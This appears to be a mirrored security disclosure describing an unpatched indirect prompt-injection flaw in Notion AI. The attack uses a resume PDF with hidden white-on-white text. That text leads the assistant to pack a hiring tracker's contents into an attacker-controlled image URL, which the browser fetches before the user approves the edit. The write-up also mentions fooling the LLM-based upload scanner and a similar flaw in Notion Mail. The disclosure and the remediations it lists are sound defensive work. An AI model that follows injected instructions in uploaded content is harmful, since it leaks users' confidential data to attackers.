Notion AI:未修補的數據洩露漏洞被揭露

Notion AI:未修補的數據洩露漏洞被揭露

Hacker News·

Notion AI 存在一項透過間接提示注入導致數據洩露的漏洞,其 AI 編輯會在用戶批准前被儲存。據報導,該公司已將此發現標記為「不適用」。

Solutions

Industries

Partners

Resources

Book a Demo

Threat Intelligence

Notion AI: Unpatched Data Exfiltration

HuggingFace Chat Exfiltrates Data

Screen takeover attack in AI tool acquired for $1B

Google Antigravity Exfiltrates Data

HN #1

CellShock: Claude AI is Excel-lent at Stealing Data

Hijacking Claude Code via Injected Marketplace Plugins

Data Exfiltration from Slack AI via Indirect Prompt Injection

HN #1

Data Exfiltration from Writer.com via Indirect Prompt Injection

HN #5

Case Study in OWASP for LLM Top 10

Case study in MITRE Atlas

Threat Intelligence

Table of Content

Table of Content

Table of Content

Notion AI: Unpatched Data Exfiltration

Notion AI is susceptible to data exfiltration via indirect prompt injection due to a vulnerability in which AI document edits are saved before user approval.

Image

Notion AI allows users to interact with their documents using natural language… but what happens when AI edits are made prior to user approval?In this article, we document a vulnerability that leads Notion AI to exfiltrate user data (a sensitive hiring tracker document) via indirect prompt injection. Users are warned about an untrusted URL and asked for approval to interact with it - but their data is exfiltrated before they even respond.

We responsibly disclosed this vulnerability to Notion via HackerOne. Unfortunately, they said “we're closing this finding as Not Applicable”.

Stealing Hiring Tracker Data with a Poisoned Resume

The user uploads a resume (untrusted data) to their chat session.Here, the untrusted data source is a resume PDF, but a prompt injection could be stored in a web page, connected data source, or a Notion page.

Image

This document contains a prompt injection hidden in 1 point font white on white text with a square white image covering the text for good measure. The LLM can read it with no issues, but the document appears benign to the human eye.

A Note on Defenses: Notion AI uses an LLM to scan document uploads and present a warning if a document is flagged as malicious. As this warning is triggered by an LLM, it can be bypassed by a prompt injection that convinces the evaluating model that the document is safe. For this research, we did not focus on bypassing this warning because the point of the attack is the exfiltration mechanism, not the method of injection delivery. In practice, an injection could easily be stored in a source that does not appear to be scanned, such as a web page, Notion page, or connected data source like Notion Mail.

The user asks Notion AI for help updating a hiring tracker based on the resume.

Image

Notion AI is manipulated by the prompt injection to insert a malicious image into the hiring tracker. The prompt injection manipulates Notion AI to (1) construct a URL by collecting all of the text in the document and appending the data to an attacker-controlled domain, and (2) insert an ‘image’ into the Notion Page using the constructed URL as the image source.

Image

Here, it appears as though the user is prompted for approval. However, unbeknownst to the user, the edit has already occurred before the user is prompted for approval. When the edit occurred, the user’s browser made a request to the attacker’s server, attempting to retrieve the image. This request exfiltrates the document contents contained in the URL constructed by Notion AI.Whether or not the user accepts the edit, the attacker successfully exfiltrates the data.

The attacker reads the sensitive hiring tracker data from their server logs.Once the user’s browser has made a request for the malicious image, the attacker can read the sensitive data contained in the URL from their request logs.

Image

In this attack, exfiltrated data included salary expectations, candidate feedback, internal role details, and other sensitive information such as diversity hiring goals.

Additional Attack Surface

The Notion Mail AI drafting assistant is susceptible to rendering insecure Markdown images within email drafts, resulting in data exfiltration. If a user mentions an untrusted resource while drafting, content from the user’s query or other mentioned resources can be exfiltrated.  E.g., “Hey, draft me an email based on @untrusted_notion_page and @trusted_notion_page”.The attack surface is reduced for Notion Mail’s drafting assistant as the system appears to only have access to data sources within the Notion ecosystem that are explicitly mentioned by the user (as opposed to Notion AI’s main offering, which supports web search, document upload, integrations, etc.).

Recommended Remediations for Organizations:

Institute a vetting process for connected data sources. Restrict use of connectors that can access highly sensitive or highly untrusted data from: Settings > Notion AI > Connectors.

To reduce the risk of untrusted data being processed in the workspace, admins can configure: Settings > Notion AI > AI Web Search > Enable web search for workspace > Off.

Individual users should avoid including sensitive personal data that could be leveraged in a spearphishing attack when configuring personalization for Notion AI via: Settings > Notion AI > Personalization.

Individual users can configure: Settings > Notion AI > AI Web Search > Require confirmation for web requests > On.

Note: Implementing these remediations will reduce the risk surface, but will not nullify the core vulnerability.

Recommended Remediations for Notion:

Programmatically prohibit automatic rendering of Markdown images from external sites in Notion AI page creation or update outputs without explicit user approval.

Programmatically prohibit automatic rendering of Markdown images from external sites in Notion AI mail drafts.

Implement a strong Content Security Policy. This will prevent network requests from being made to unapproved external domains.

Ensure the CDN used to retrieve images for display in Notion and image previews for display in Notion Mail cannot be used as an open redirect to bypass the CSP policy that is set.

Responsible Disclosure Timeline

12/24/2025 Initial report made via HackerOne12/24/2025 Report is acknowledged, altered write-up requested12/24/2025 PromptArmor follows up with the requested format12/29/2025 Report closed as non-applicable01/07/2025 Public disclosure

On this page

Label

Hacker News

相關文章

  1. Superhuman AI 透過提示注入漏洞竊取電子郵件

    3 個月前

  2. Notion 洩漏所有公開頁面編輯者的電子郵件地址

    4 天前

  3. 設計具備防禦提示注入能力的 AI 代理

    OpenAI · 大約 1 個月前

  4. 濫用 Notion 的 AI Agent 進行數據盜竊

    7 個月前

  5. IBM AI('Bob')透過提示注入漏洞,可下載並執行惡意軟體

    3 個月前